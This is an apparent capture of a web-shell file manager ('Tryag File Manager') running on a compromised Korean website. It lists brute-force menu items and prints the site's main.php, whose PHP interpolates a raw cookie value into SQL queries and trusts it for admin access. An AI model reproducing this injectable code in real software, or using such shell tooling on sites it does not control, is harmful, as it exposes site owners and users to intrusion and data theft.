Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
egg.eemo.co.kr
/
public_html
/
super5
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/egg.eemo.co.kr/public_html/super5/main.php
<? session_cache_limiter('no-cache, must-revalidate'); session_start(); header("Pragma: no-cache"); header("Cache-Control: no-cache,must-revalidate"); header("Content-Type: text/html; charset=utf-8"); include_once("dbconn.php"); include_once("lib.php"); $rs_my=RS("select * from admin_member where no='{$_COOKIE[umemno]}' "); if($rs_my[mlevel]==3) { header("Location: myfarm.php"); } else if($rs_my[mlevel]==2) { $rs_per=RS("select * from admin_permit where admin_mem_no='{$_COOKIE[umemno]}' and menu_access='1' "); $pg=$arr_sub_page[$rs_per[menu_id]][1]; header("Location: {$pg}"); } else { header("Location: farm.php"); } ?>